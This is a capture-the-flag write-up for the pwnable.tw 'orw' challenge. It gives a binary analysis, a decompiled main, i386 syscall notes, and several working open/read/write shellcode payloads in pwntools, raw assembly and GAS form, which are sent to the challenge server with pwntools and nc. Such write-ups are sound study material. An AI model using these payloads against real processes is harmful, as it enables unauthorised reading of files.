Challenge 2. orw (pwnable.tw)

❯ file orw
orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped
❯ checksec orw
[*] '/root/share/pwn/work/pwnable.tw/2.orw/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
// Decompiler output for main() — kept verbatim so it matches the binary above.
// Flow: install a seccomp sandbox (orw_seccomp, body not shown; per the challenge
// hint it leaves only open/read/write usable), read up to 0xC8 (200) bytes of
// attacker-supplied code into `shellcode` (presumably a global, writable buffer —
// its declaration is not shown) and call it. This only works because NX is
// disabled (checksec: "NX disabled", "Has RWX segments"), so the data buffer is
// executable. Security-relevant details: the read() return value is never
// checked, and the bytes are used as-is — no strcpy/strlen, so NUL bytes in the
// payload are harmless. Because the buffer is invoked with a call, a `ret` from
// the payload lands back here on `return 0`.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();                          // sandbox: only open/read/write allowed (per hint)
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);             // 200 bytes, return value unchecked, NULs pass through
  ((void (*)(void))shellcode)();          // execute the writable buffer as code (NX disabled)
  return 0;
}

Write shellcode, send it, and it is executed. Note that the goal is not a shell: the sandbox installed by orw_seccomp() permits only the open, read and write syscalls (see the hint below), so an execve-based "getshell" payload is blocked — the shellcode has to open, read and write out the flag itself.
Hint: Read the flag from /home/orw/flag. Only the open, read and write syscalls are allowed.

i386 Linux syscall convention: syscall number in eax, arguments in ebx, ecx, edx (then esi, edi, ebp), `int 0x80`, result in eax (a value in [-4095, -1] is -errno).
sys_open  (eax=0x5): ebx=path, ecx=flags (0 = O_RDONLY), edx=mode (ignored unless O_CREAT)
sys_read  (eax=0x3): ebx=fd — take it from the eax that open returned rather than assuming it is 3 (it is only 3 if 0/1/2 are the only open descriptors), ecx=buf, edx=len (0x50 here)
sys_write (eax=0x4): ebx=1 (stdout), ecx=buf, edx=len — ideally the byte count that read returned, otherwise uninitialised buffer bytes are printed too

#!/usr/bin/env python
# coding=utf-8

from pwn import *

# Connect to the remote challenge instance; swap in process('./orw') to debug
# against the local binary instead.
TARGET_HOST, TARGET_PORT = "chall.pwnable.tw", 10001
io = remote(TARGET_HOST, TARGET_PORT)

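# i386 Linux shellcode: open("/home/orw/flag") -> read(fd, buf, n) -> write(1, buf, n).
# orw_seccomp() leaves only open/read/write usable (see the hint), so an execve-based
# getshell payload is not an option: the flag is read and echoed to stdout instead.
# The binary takes the payload with read(), not strcpy, so NUL bytes in the encoding are
# harmless; full-width register moves are used for clarity rather than partial ones.
# Fixes over the naive version: the fd comes from open's return value instead of a
# guessed 3, edx is set as a whole (a `mov dl` would keep whatever the caller left in the
# upper bytes), and write() sends only the number of bytes read() actually returned.
shellcode = asm("""
        # open("///home/orw/flag", O_RDONLY) -- path built from 4-byte pushes, '/'-padded
        xor     eax, eax
        xor     ecx, ecx                # flags = O_RDONLY; also the NUL pushed below
        xor     edx, edx                # mode = 0 (ignored without O_CREAT)
        mov     al, 0x5                 # __NR_open (i386)
        push    ecx                     # "\\0" string terminator
        push    0x67616c66              # "flag"
        push    0x2f77726f              # "orw/"
        push    0x2f656d6f              # "ome/"
        push    0x682f2f2f              # "///h"
        mov     ebx, esp                # path
        int     0x80                    # eax = fd (or -errno)

        # read(fd, esp, 0x50) -- the path bytes on the stack are reused as the buffer
        mov     ebx, eax                # fd from open's return value, not a guessed 3
        mov     ecx, esp                # buf
        mov     edx, 0x50               # count; whole register, upper bytes are undefined at entry
        mov     eax, 0x3                # __NR_read
        int     0x80                    # eax = bytes read

        # write(1, esp, bytes_read)
        mov     edx, eax                # echo only what was actually read
        mov     ebx, 0x1                # stdout
        mov     eax, 0x4                # __NR_write
        int     0x80
        # No exit: it is not an allowed syscall. Execution falls off the end into the
        # rest of the 0xC8-byte buffer and the process most likely faults there -- the
        # flag is already on stdout by then.
        """)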

# Deliver the payload only once the prompt has been printed, so the bytes land in the
# read(0, ...) call; then hand the connection over so the flag written to stdout
# appears on the terminal.
PROMPT = "Give my your shellcode:"
io.sendafter(PROMPT, shellcode)
io.interactive()
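; i386 Linux shellcode: open("/home/orw/flag") -> read -> write(1).
; Only these three syscalls pass the seccomp filter (see hint), so the flag is
; echoed to stdout instead of spawning a shell. The payload is delivered via
; read(), so NUL bytes in the instruction encoding are harmless.
; Compared with the naive version: the fd is taken from open's return value
; (not assumed to be 3), edx/ebx are written as whole registers (a `mov dl`/
; `mov bl` keeps the undefined upper bytes -- `mov bl, 3` right after
; `mov ebx, esp` yields a garbage fd), and write() sends only what read() returned.

; syscall: open("///home/orw/flag", O_RDONLY)
xor     eax, eax
xor     ecx, ecx        ; flags = O_RDONLY; doubles as the NUL pushed below
xor     edx, edx        ; mode = 0 (ignored without O_CREAT)
mov     al, 0x5         ; __NR_open (i386)

push    ecx             ; \x00 string end
push    0x67616c66      ; flag
push    0x2f77726f      ; orw/
push    0x2f656d6f      ; ome/
push    0x682f2f2f      ; ///h  (extra slashes pad the path to a multiple of 4 bytes)
mov     ebx, esp        ; path
int     0x80            ; eax = fd (or -errno)

; syscall: read(fd, buf, 0x50) -- the path bytes on the stack are reused as the buffer
mov     ebx, eax        ; fd from open's return value; do not assume 3
mov     ecx, esp        ; buf
mov     edx, 0x50       ; len, whole register: upper bytes of edx are undefined at entry
mov     eax, 0x3        ; __NR_read
int     0x80            ; eax = bytes read

; syscall: write(1, buf, bytes_read)
mov     edx, eax        ; echo only what was actually read
mov     ebx, 0x1        ; fd: stdout (whole register, see note above about `mov bl`)
mov     eax, 0x4        ; __NR_write
int     0x80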

Other writeups
Reference: https://pwnable.tw/writeup/2/184 by akiym

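# GAS source (Intel syntax) for the same open/read/write payload, assembled with
# pwntools' `asm` CLI and piped straight into the challenge. The jmp/call/pop idiom
# obtains the address of the path string without needing to know where the payload
# was loaded. NUL bytes are fine: the binary reads the payload with read().
#
# Fixes over the original: the read buffer is reserved BELOW the saved return
# address instead of on top of it (the original read into [esp], i.e. over the
# return address into main, so its final `ret` could not return cleanly), and the
# syscall numbers are loaded into a zeroed eax instead of relying on the previous
# return value having zero upper bytes (which breaks as soon as open() fails).
.intel_syntax noprefix
.globl _start
_start:
    jmp loadstring              # -> call file_read, which pushes &path as its "return address"
file_read:
    pop ebx                     # ebx = &"/home/orw/flag"
    xor eax, eax
    xor ecx, ecx                # flags = O_RDONLY
    xor edx, edx                # mode = 0 (ignored without O_CREAT)
    mov al, 0x5                 # __NR_open (i386)
    int 0x80                    # eax = fd (or -errno)

    mov ebx, eax                # fd from open's return value; never assume it is 3
    sub esp, 0x40               # buffer below the saved return address, not on top of it
    mov ecx, esp                # buf
    mov edx, 0x40               # count (whole register; upper bytes undefined at entry)
    mov eax, 0x3                # __NR_read
    int 0x80                    # eax = bytes read

    mov edx, eax                # write exactly what was read
    mov ebx, 0x1                # stdout
    mov eax, 0x4                # __NR_write
    int 0x80

    add esp, 0x40
    ret                         # back into main after its call; whether the process then
                                # exits cleanly depends on the seccomp policy (exit is not
                                # listed as allowed) -- the flag is already on stdout either way
loadstring:
    call file_read              # pushes the address of the string below
    .asciz "/home/orw/flag"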
# pwntools' `asm` CLI: assemble sc.S (GAS/Intel syntax) into raw bytes in ./sc.
# Its default context is i386, matching the 32-bit target; pass -c if that default changes.
% asm -i sc.S -o sc
# Feed the raw payload to the service; read(0, &shellcode, 0xC8) takes it as-is,
# NULs included, so no encoding is needed.
% nc chall.pwnable.tw 10001 < sc